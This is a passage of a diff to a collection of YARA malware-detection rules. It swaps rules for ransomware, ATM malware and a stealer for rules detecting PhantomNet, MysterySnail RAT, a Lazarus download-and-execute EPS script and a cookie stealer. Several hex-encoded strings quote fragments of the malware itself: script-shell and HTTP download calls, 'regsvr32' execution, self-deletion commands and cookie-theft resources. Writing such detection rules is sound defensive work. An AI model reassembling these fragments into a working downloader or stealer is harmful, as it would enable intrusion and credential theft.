+		$s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii
+		$s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d }
+		$s11 = "&About VVSup..." fullword wide
+		$s12 = "%d.tmp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and 4 of ( $debug* ) and 3 of ( $reg* )
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 7 of them
 }
-rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE
+rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect MSIPackage used by Casbaneiro"
+		description = "Detect PhantomNet (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "47a5ea47-f799-5467-a482-9816c0de3ecf"
-		date = "2020-06-05"
-		modified = "2020-06-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22"
+		id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78"
+		date = "2020-12-19"
+		modified = "2020-12-19"
+		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b"
+		logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a"
 		score = 75
-		quality = 71
+		quality = 65
 		tags = "FILE"
-		hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d"
+		hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858"
+		hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056"
 
 	strings:
-		$x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii
-		$s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii
-		$s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii
-		$s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii
-		$s5 = "https://www.mozilla.com0\\r" fullword wide
-		$s6 = "__CxxFrameHandler" fullword ascii
-		$s7 = "release+certificates@mozilla.com" fullword ascii
-		$s8 = "setup-stub.exe" fullword ascii
-		$s9 = "7zS.sfx.exe" fullword ascii
+		$s1 = { 25 73 25 30 38 58 }
+		$s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 }
+		$s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 }
+		$s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 }
+		$s5 = "Proxy-Authorization: NTLM" fullword ascii
+		$s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a }
+		$s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 }
+		$s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c }
+		$s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 }
+		$s10 = { 48 6f 73 74 3a 20 }
+		$s11 = { 43 6f 6f 6b 69 65 73 3a 20 }
+		$s12 = "Proxy-Authenticate: NTLM" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xd0cf and filesize > 100KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and 9 of them
 }
-rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect the DispCashBR ATM malware"
+		description = "Detect MysterySnaial RAT implant"
 		author = "Arkbird_SOLG"
-		id = "629261d8-242c-580d-aa4d-4b313c77edef"
-		date = "2020-05-14"
-		modified = "2021-05-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18"
+		id = "2fa5015a-144f-52f6-8a5f-28fce10861e3"
+		date = "2021-10-13"
+		modified = "2021-10-14"
+		reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25"
 		license_url = "N/A"
-		logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47"
-		score = 75
+		logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175"
-		hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
+		hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d"
+		hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e"
+		hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc"
+		level = "experimental"
 		tlp = "White"
-		adversary = "-"
+		adversary = "MysterySnail"
 
 	strings:
-		$seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 }
-		$seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 }
-		$seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 }
-		$seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 }
+		$s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 }
+		$s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f }
+		$s3 = { 25 2a 73 70 75 62 3a 0a }
+		$s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 }
+		$s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5A4D and filesize > 500KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect QNAPCrypt ransomware (x86 version)"
+		description = " Detected Lazarus EPS script for download and execute the payload in base 64"
 		author = "Arkbird_SOLG"
-		id = "fcdec43a-de70-57a2-9527-263685acc820"
-		date = "2021-08-11"
-		modified = "2021-08-12"
-		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29"
+		id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403"
+		date = "2020-07-28"
+		modified = "2020-07-28"
+		reference = "https://twitter.com/spider_girl22/status/1287952503280082944"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30"
 		license_url = "N/A"
-		logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf"
+		logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552"
 		score = 75
-		quality = 71
+		quality = 45
 		tags = "FILE"
-		hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467"
-		hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36"
-		hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b"
-		hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7"
 
 	strings:
-		$s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 }
-		$s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 }
-		$s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a }
-		$s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa }
-		$s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c }
-		$s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 }
-		$x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd }
-		$x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff }
-		$x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 }
-		$x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 }
-		$x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 }
-		$x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 }
+		$s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 }
+		$s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 }
+		$s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 }
+		$s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 }
+		$s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 }
+		$s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 }
+		$s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 }
+		$s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 }
+		$s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 }
+		$s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 }
+		$s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E }
+		$s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 }
+		$s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 }
+		$s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 }
+		$s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 }
+		$URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? }
+		$URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 25KB and 3 of ( $s* ) and 2 of ( $x* )
+		uint16( 0 ) == 0x33c9 and filesize < 3KB and ( 1 of ( $URL* ) ) and ( 12 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE
+
+rule ARKBIRD_SOLG_MAL_Stealer_Cookie_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect QNAPCrypt ransomware (x64 version)"
+		description = "Detect strings used by EdgeCookiesView and ChromeCookiesView in the ressources of the Cookie Stealer"
 		author = "Arkbird_SOLG"
-		id = "8cd54646-87da-5261-82f3-68ab96549379"
-		date = "2021-08-11"
-		modified = "2021-08-12"
-		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22"
+		id = "02a68973-73b2-572a-a358-f0edc921773a"
+		date = "2020-07-09"
+		modified = "2020-07-09"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1281154921811841026"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-09/MAL_Stealer_Cookie_July_2020_1.yar#L3-L32"
 		license_url = "N/A"
-		logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4"
+		logic_hash = "63747567a9dd68ac0d16b67910957cb9bc28d7237f431ac0c76403ca810e1b94"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
-		hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8"
-		hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b"
-		hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "47b2b56c961cdc78bf06eed30737232ba99424b51648418bacacd522a12ad339"
 
 	strings:
-		$s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 }
-		$s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 }
-		$s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 }
